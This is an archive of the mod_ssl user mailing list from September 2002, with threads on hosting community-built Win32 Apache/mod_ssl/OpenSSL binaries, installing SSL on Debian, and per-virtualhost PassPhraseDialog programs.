Subject: Re: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
References:  <000f01c264fc$8f49a660$6e01a8c0@cbs> <3D92700F.90801@sympatico.ca> <002f01c26506$5b9e37e0$6e01a8c0@cbs> <006701c26507$658cd4e0$6e01a8c0@cbs>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ken,


The source for:
- Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
- Openssl-0.9.6g-Win32.zip

2002.09.21  12.08 3,066,788 apache_1.3.26-win32-src.zip
2002.09.18  04.32   753,241 mod_ssl-2.8.10-1.3.26.tar.gz.tar
2002.09.21  12.09 2,170,570 openssl-0.9.6g.tar.gz.tar



The source for:
- Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip

2002.09.25  01.14 6,750,712 httpd-2.0.42-win32-src.zip
2002.09.21  12.09 2,170,570 openssl-0.9.6g.tar.gz.tar


Chris.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 08:33:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA20294; Thu, 26 Sep 2002 08:32:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from campbus.com id IAA20290; Thu, 26 Sep 2002 08:31:51 +0200 (MET DST)
Received: from campbus ([192.168.1.110])
	by campbus.com (8.9.3/8.9.3) with SMTP id CAA29959
	for ; Thu, 26 Sep 2002 02:03:25 -0400
Message-ID: <00ab01c26525$fa4ada00$6e01a8c0@cbs>
From: "Ken Campney" 
To: 
References:  <000f01c264fc$8f49a660$6e01a8c0@cbs> <3D92700F.90801@sympatico.ca> <002f01c26506$5b9e37e0$6e01a8c0@cbs> <006701c26507$658cd4e0$6e01a8c0@cbs> <3D929FA3.6050107@sympatico.ca>
Subject: Re: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
Date: Thu, 26 Sep 2002 02:28:15 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Campney" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Chris,

I've downloaded your files just to make sure I have them.

Do you think ".tgz" files will be needed or are the access for those a
little better than the Win32 files?

When everything is set, I'll give you the link/links to the files.

As a secondary thought, I suppose I could just set you up with an ftp
account to upload files as needed.

Ken
----- Original Message -----
From: "hunter" 
To: 
Sent: Thursday, September 26, 2002 1:48 AM
Subject: Re: Crypto Export restrictions (was:
Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)


> Ken Campney wrote:
> > ERRR.
> >
> > Do I have the right file name?? lol
> >
> > What ever the file name/names in need of a depot is, I'm assuming it was
> > "Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip"
> >
> > Ken
> > ----- Original Message -----
> > From: "Ken Campney" 
> > To: 
> > Sent: Wednesday, September 25, 2002 10:42 PM
> > Subject: Re: Crypto Export restrictions (was:
> > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
> >
> >
> Ken,
>
> I copied the filename conventions from the previous versions ... looked
> at them to see what they contain, so as to remain consistent.  A large
> number of people still want to use the Apache 1.3.26, with fixed OpenSSL
> - I am using Apache 2.0.40 (soon to move to 2.0.42).  I can make any
> version, but this is the most popular right now.  OpenSA has a nice
> distribution, but I have not checked to see what rev's they are at.
>
> Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
> - contains Apache 1.3.26 and Mod_SSL 2.8.10, binaries built with OpenSSL
> libs, etc.
>
> Openssl-0.9.6g-Win32.zip
> - contains only OpenSSL binaries
>
> The parts are not so well integrated as they are with Apache 2.0.42.
>
>
> Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip
>
> - contains all 3 parts
> - Mod_SSL is built into Apache 2 and the make like to put the OpenSSL
> binaries into the Apache/bin directory.
>
>
> Actual urls...
>
>
http://tor.ath.cx/~hunter/apache/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g
-Win32.zip
> http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip
>
> http://tor.ath.cx/~hunter/apache/Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip
>
>
>
> I hope I did not misunderstood what you wanted ... (I talk too much)
>
> Chris.
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 11:18:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA24660; Thu, 26 Sep 2002 11:17:05 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA24651; Thu, 26 Sep 2002 11:16:15 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 4ECA44CE744; Thu, 26 Sep 2002 11:16:16 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 91E20286B5; Thu, 26 Sep 2002 11:07:39 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta5.snfc21.pbi.net id AAA09314; Thu, 26 Sep 2002 00:00:34 +0200 (MET DST)
Received: from ibrahim ([66.125.19.74])
 by mta5.snfc21.pbi.net (iPlanet Messaging Server 5.1 (built May  7 2001))
 with SMTP id <0H3000KNPL4VYV@mta5.snfc21.pbi.net> for modssl-users@modssl.org;
 Wed, 25 Sep 2002 15:00:31 -0700 (PDT)
Date: Wed, 25 Sep 2002 14:58:05 -0700
From: Ibrahim Shaik 
Subject: Configure SSL on Debian Linux Server
In-reply-to: <005801c264d9$eb5df780$0a01a8c0@rkukiela>
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
Importance: Normal
X-Priority: 3 (Normal)
X-MSMail-priority: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ibrahim Shaik 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi all ,

I am naive to SSL technologies. We are trying to install SSL on Debian Linux
Server. We are having a Debian released Apache version .

Where I can get good documentation about installing SSL on Debian Linux.

What all do I need to configure the SSL ? As far as my knowledge , we need
to install Open-SSL along with mod-ssl  on the server and set the necessary
config files. Am I right?

The server we are using is going to host some applications/ web pages ,
which are accessed from PDA phones. , I appreciate  if any one can brief how
and where to start with.

Thanks in advance

Regards
Ibrahim
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.391 / Virus Database: 222 - Release Date: 9/19/2002
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 11:18:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA24663; Thu, 26 Sep 2002 11:17:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA24655; Thu, 26 Sep 2002 11:16:16 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8920D4CE768; Thu, 26 Sep 2002 11:16:16 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8BDFA286B5; Thu, 26 Sep 2002 11:09:21 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from trivadis.com id BAA11275; Thu, 26 Sep 2002 01:38:53 +0200 (MET DST)
Envelope-to: modssl-users@modssl.org
Received: from localhost.localdomain ([127.0.0.1] helo=trivadis.com)
	by trivadis.com with smtp (Exim 3.34 #1)
	id 17uLbx-0000St-00
	for modssl-users@modssl.org; Thu, 26 Sep 2002 01:30:29 +0200
Date: Thu, 26 Sep 2002 01:30:29 +0200
From: Tim Tassonis 
To: modssl-users@modssl.org
Subject: Re: Is anyone doing this!?!
In-Reply-To: <005801c264d9$eb5df780$0a01a8c0@rkukiela>
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela>
X-Mailer: Sylpheed version 0.8.2 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Tassonis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 25 Sep 2002 16:24:22 -0500
"Rick Kukiela"  wrote:

> I need to know if anyone else is doing this successfully... loading
> apache aware ssl with multiple vhosts --- all with their own PEM
> passphrase on their key files --- and each has thier own
> PassPhraseDialog exec: line where it gets the password from... if you do
> this sucessfully, can you please send a part of ur httpd.conf file so I
> can see how you are doing it, the way im doing it is messing it up
> because what it ends up doing is taking the very last occurance of the
> PassPhraseDialog directive and uses it for ALL of the sites when it
> should us each one for each site respectively...

If you are talking about Name Based Virtual Hosts (same ip:port, but
different names) you are out of luck. You can't present different
certificates with Name Based Virtual Hosts, because the Hostname is not
known by the server at the time it should present the certificate. The
hostname is only present in the http headers, which are transmitted
_after_ the SSL handshake.

Otherwise, I'd suggest you send your config file so people can tell you
what's wrong.

Bye
Tim

> 
> any help?
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 12:32:34 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA00550; Thu, 26 Sep 2002 12:31:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from outpost.poyntons.com.au id MAA00542; Thu, 26 Sep 2002 12:30:53 +0200 (MET DST)
Received: (from uucp@localhost)
	by outpost.poyntons.com.au (8.8.8+Sun/8.8.8) id RAA24418
	for ; Thu, 26 Sep 2002 17:36:38 +0800 (WST)
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Thu, 26 Sep 2002 17:38:36 +0800
From: "James Bromberger" 
To: , 
Subject: Re: Configure SSL on Debian Linux Server
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "James Bromberger" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


apt-get install libapache-mod-ssl

And then check your configuration file that you are loading the module
and have a key and certificate.

	James
	Debian Developer.

>>> ibrahim@mediasoft-inc.com 09/26/02 05:58am >>>

Hi all ,

I am naive to SSL technologies. We are trying to install SSL on Debian
Linux
Server. We are having a Debian released Apache version .

Where I can get good documentation about installing SSL on Debian
Linux.

What all do I need to configure the SSL ? As far as my knowledge , we
need
to install Open-SSL along with mod-ssl  on the server and set the
necessary
config files. Am I right?

The server we are using is going to host some applications/ web pages
,
which are accessed from PDA phones. , I appreciate  if any one can
brief how
and where to start with.

Thanks in advance

Regards
Ibrahim
---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.391 / Virus Database: 222 - Release Date: 9/19/2002
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 15:42:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA04465; Thu, 26 Sep 2002 15:41:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts8-srv.bellnexxia.net id PAA04453; Thu, 26 Sep 2002 15:40:14 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253]) by tomts8-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020926134013.YAVQ28662.tomts8-srv.bellnexxia.net@sympatico.ca>
          for ; Thu, 26 Sep 2002 09:40:13 -0400
Message-ID: <3D930E47.2010201@sympatico.ca>
Date: Thu, 26 Sep 2002 09:40:23 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Crypto Export restrictions (was: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
References:  <000f01c264fc$8f49a660$6e01a8c0@cbs> <3D92700F.90801@sympatico.ca> <002f01c26506$5b9e37e0$6e01a8c0@cbs> <006701c26507$658cd4e0$6e01a8c0@cbs> <3D929FA3.6050107@sympatico.ca> <00ab01c26525$fa4ada00$6e01a8c0@cbs>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ken Campney wrote:
> Chris,
> 
> I've downloaded your files just to make sure I have them.
> 
> Do you think ".tgz" files will be needed or are the access for those a
> little better than the Win32 files?
> 
> When everything is set, I'll give you the link/links to the files.
> 
> As a secondary thought, I suppose I could just set you up with an ftp
> account to upload files as needed.
> 
> Ken
> ----- Original Message -----
> From: "hunter" 
> To: 
> Sent: Thursday, September 26, 2002 1:48 AM
> Subject: Re: Crypto Export restrictions (was:
> Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
> 
> 
> 
>>Ken Campney wrote:
>>
>>>ERRR.
>>>
>>>Do I have the right file name?? lol
>>>
>>>What ever the file name/names in need of a depot is, I'm assuming it was
>>>"Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip"
>>>
>>>Ken
>>>----- Original Message -----
>>>From: "Ken Campney" 
>>>To: 
>>>Sent: Wednesday, September 25, 2002 10:42 PM
>>>Subject: Re: Crypto Export restrictions (was:
>>>Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip)
>>>
>>>
>>
>>Ken,
>>
>>I copied the filename conventions from the previous versions ... looked
>>at them to see what they contain, so as to remain consistent.  A large
>>number of people still want to use the Apache 1.3.26, with fixed OpenSSL
>>- I am using Apache 2.0.40 (soon to move to 2.0.42).  I can make any
>>version, but this is the most popular right now.  OpenSA has a nice
>>distribution, but I have not checked to see what rev's they are at.
>>
>>Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>>- contains Apache 1.3.26 and Mod_SSL 2.8.10, binaries built with OpenSSL
>>libs, etc.
>>
>>Openssl-0.9.6g-Win32.zip
>>- contains only OpenSSL binaries
>>
>>The parts are not so well integrated as they are with Apache 2.0.42.
>>
>>
>>Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip
>>
>>- contains all 3 parts
>>- Mod_SSL is built into Apache 2 and the make like to put the OpenSSL
>>binaries into the Apache/bin directory.
>>
>>
>>Actual urls...
>>
>>
> 
> http://tor.ath.cx/~hunter/apache/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g
> -Win32.zip
> 
>>http://tor.ath.cx/~hunter/apache/Openssl-0.9.6g-Win32.zip
>>
>>http://tor.ath.cx/~hunter/apache/Apache_2.0.42-OpenSSL_0.9.6g-Win32.zip
>>
>>
>>
>>I hope I did not misunderstood what you wanted ... (I talk too much)
>>
>>Chris.
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Ken,

The sources are always easy to get, at least from my experience.  The 
problem lies in the fact that Windows machines do not have a compiler.
I am on the lists, so I know when people are looking for a new build 
(security alert for example).  It does not take me long to buld the code.

Te most common problem for anyone trying to build the code is to get the 
build machine set up properly; I plan to address this soon, with a 
How-To doc.

It makes the most sense to have ftp access, I guess. But, that can go 
either way.  I can also provide you with an ftp account on my server as 
well.  It is more expedient for me to make the code and put it on your 
server.

It mitgates some of the risks of using the code, by restricting who has 
write access to it.  I generally warn people that I did not build a 
properly configured server with the older builds and leave it up to them 
to test it.  I will respond to problems caused by a bad build.  The new 
code, I am using (testing) and know first hand if I mess up the build. 
Generally though, once you get the build working it is reliable -- I 
don't have to code anything afterall ... just follow instructions.

My personal email account is hunter@tor.ath.cx.

If you hit my index.html on tor.ath.cx you will get a 'new install page' 
for IIS ... my idea of humor ... my server is for friends and they know 
enough to look for an 'easter egg' - click the Icon.

My internet server is a Linux box, I build and use the Windows code for 
my employer, where I manage more than 20,000 installations of Apache. 


I will touch bases with you later.  Thanks again.

Chris.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 17:44:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA07387; Thu, 26 Sep 2002 17:43:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from forest.mmhosting.com id RAA07380; Thu, 26 Sep 2002 17:42:39 +0200 (MET DST)
Received: from rkukiela (17-120.104.popsite.net [66.19.53.120])
	by onrampnetworks.com (8.10.2/8.10.2) with SMTP id g8QFqmW17570
	for ; Thu, 26 Sep 2002 10:53:28 -0500
Message-ID: <000b01c26573$4bd63890$0a01a8c0@rkukiela>
From: "Rick Kukiela" 
To: 
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela> 
Subject: Re: Is anyone doing this!?!
Date: Thu, 26 Sep 2002 10:41:36 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rick Kukiela" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Um... no, every virtual host has its own IP address, thats not what I'm
asking... What I need to know is, if there is away for each virtualhost to
have its OWN PassPhraseDialog directive. Right now I try to do that and It
just uses the last occurence of the passphrasedialog directive for EVERY
virtualhost. So basically its trying to use the Password for the last
virtualhost on all of the virtual hosts. You can see my problem now?


Any help?

Rick
----- Original Message -----
From: "Tim Tassonis" 
To: 
Sent: Wednesday, September 25, 2002 6:30 PM
Subject: Re: Is anyone doing this!?!


> On Wed, 25 Sep 2002 16:24:22 -0500
> "Rick Kukiela"  wrote:
>
> > I need to know if anyone else is doing this successfully... loading
> > apache aware ssl with multiple vhosts --- all with their own PEM
> > passphrase on their key files --- and each has thier own
> > PassPhraseDialog exec: line where it gets the password from... if you do
> > this sucessfully, can you please send a part of ur httpd.conf file so I
> > can see how you are doing it, the way im doing it is messing it up
> > because what it ends up doing is taking the very last occurance of the
> > PassPhraseDialog directive and uses it for ALL of the sites when it
> > should us each one for each site respectively...
>
> If you are talking about Name Based Virtual Hosts (same ip:port, but
> different names) you are out of luck. You can't present different
> certificates with Name Based Virtual Hosts, because the Hostname is not
> known by the server at the time it should present the certificate. The
> hostname is only present in the http headers, which are transmitted
> _after_ the SSL handshake.
>
> Otherwise, I'd suggest you send your config file so people can tell you
> what's wrong.
>
> Bye
> Tim
>
> >
> > any help?
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 20:14:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA12003; Thu, 26 Sep 2002 20:13:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA11995; Thu, 26 Sep 2002 20:12:30 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A17F54CE744; Thu, 26 Sep 2002 20:12:30 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E148428710; Thu, 26 Sep 2002 19:47:24 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pascal.arago.de id RAA08049; Thu, 26 Sep 2002 17:54:20 +0200 (MET DST)
Received: Received: (from uucp@localhost)
	by pascal.arago.de id g8QFsHf2486977
	for modssl-users@modssl.org; Thu, 26 Sep 2002 17:54:17 +0200 (METDST)
Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de"
 via SMTP by pascal.arago.de, id smtpdAAAa09eCp; Thu Sep 26 17:54:09 2002
Received: from ohm.arago.de (localhost [127.0.0.1])
	by carat.arago.de (8.9.3/8.9.3) with SMTP id RAA05068
	for ; Thu, 26 Sep 2002 17:53:17 +0200 (MET DST)
Received: (from gryf@localhost)
	by ohm.arago.de (SGI-8.9.3/8.9.3) id RAA06338
	for modssl-users@modssl.org; Thu, 26 Sep 2002 17:54:08 +0200 (METDST)
Date: Thu, 26 Sep 2002 17:54:08 +0200
From: Thomas Binder 
To: modssl-users@modssl.org
Subject: Re: Is anyone doing this!?!
Message-ID: <20020926175408.A18452049@ohm.arago.de>
Mail-Followup-To: modssl-users@modssl.org
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela>  <000b01c26573$4bd63890$0a01a8c0@rkukiela>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <000b01c26573$4bd63890$0a01a8c0@rkukiela>; from modssl@onrampnetworks.com on Thu, Sep 26, 2002 at 10:41:36AM -0500
Organization: arago GmbH
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Binder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

On Thu, Sep 26, 2002 at 10:41:36AM -0500, Rick Kukiela wrote:
> What I need to know is, if there is away for each virtualhost to
> have its OWN PassPhraseDialog directive. Right now I try to do
> that and It just uses the last occurence of the passphrasedialog
> directive for EVERY virtualhost. So basically its trying to use
> the Password for the last virtualhost on all of the virtual
> hosts. You can see my problem now?

If you set a program for PassPhraseDialog (i.e.
"exec:/path/to/program"), this program's first parameter will be
the name of the virtual host whose password's being requested.

HTH.


Ciao

Thomas
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 21:26:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA13937; Thu, 26 Sep 2002 21:25:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from VL-MS-MR003.sc1.videotron.ca id VAA13928; Thu, 26 Sep 2002 21:24:47 +0200 (MET DST)
Received: from toilet
 (modemcable009.231-202-24.hull.mc.videotron.ca [24.202.231.9])
 by VL-MS-MR003.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 0.9 (built Jul 29 2002))
 with ESMTP id <0H3200CLC8J3O2@VL-MS-MR003.sc1.videotron.ca> for
 modssl-users@modssl.org; Thu, 26 Sep 2002 15:23:28 -0400 (EDT)
Received: from toilet	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))	id 17ueEQ-00023D-00; Thu,
 26 Sep 2002 15:23:26 -0400
Date: Thu, 26 Sep 2002 15:23:26 -0400 (EDT)
From: Geoff Thorpe 
Subject: Re: Cryptoswift + Apache 2.0
In-reply-to: <3D81DBDC.4070505@ifrance.com>
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Cc: Estrade Matthieu 
Message-id: 
MIME-version: 1.0
Content-type: TEXT/PLAIN; charset=US-ASCII
Content-transfer-encoding: 7BIT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Just got back from travelling and you don't seem to have had a reply to
this so here goes.

On Fri, 13 Sep 2002, Estrade Matthieu wrote:

> I am actually running Apache 2.0 with mod_proxy (reverse-proxy) and SSL,
> on a Linux Redhat 7.2 dual AMD athlon 2Ghz MP with 1GB RAM.
> I am using an hardware accelerator Rainbow Cryptoswift 600. (for 600 TPS).
>
> When i benchmark the server without the reverse proxy with a local
> document, i have 560 TPS.
> When i benchmark the server with reverse proxy, i have 9 TPS...
> During all the test, the cryptoswift is blinking a little... and my cpu
> are only 5% loaded...

The obvious suggestion would be that the machine you're reverse proxying
to is the reason for the slow-down.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 26 21:29:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA14034; Thu, 26 Sep 2002 21:27:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from forest.mmhosting.com id VAA13947; Thu, 26 Sep 2002 21:26:19 +0200 (MET DST)
Received: from rkukiela (24-062.104.popsite.net [66.19.127.62])
	by onrampnetworks.com (8.10.2/8.10.2) with SMTP id g8QJbKW07286
	for ; Thu, 26 Sep 2002 14:37:20 -0500
Message-ID: <001701c26592$92f38a60$0a01a8c0@rkukiela>
From: "Rick Kukiela" 
To: 
References: <005801c264d9$eb5df780$0a01a8c0@rkukiela>  <000b01c26573$4bd63890$0a01a8c0@rkukiela> <20020926175408.A18452049@ohm.arago.de>
Subject: Re: Is anyone doing this!?!
Date: Thu, 26 Sep 2002 14:26:09 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rick Kukiela" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Wowwww thanks man, finally some help! 

much appreciated!

Rick
----- Original Message ----- 
From: "Thomas Binder" 
To: 
Sent: Thursday, September 26, 2002 10:54 AM
Subject: Re: Is anyone doing this!?!


> Hi!
> 
> On Thu, Sep 26, 2002 at 10:41:36AM -0500, Rick Kukiela wrote:
> > What I need to know is, if there is away for each virtualhost to
> > have its OWN PassPhraseDialog directive. Right now I try to do
> > that and It just uses the last occurence of the passphrasedialog
> > directive for EVERY virtualhost. So basically its trying to use
> > the Password for the last virtualhost on all of the virtual
> > hosts. You can see my problem now?
> 
> If you set a program for PassPhraseDialog (i.e.
> "exec:/path/to/program"), this program's first parameter will be
> the name of the virtual host whose password's being requested.
> 
> HTH.
> 
> 
> Ciao
> 
> Thomas
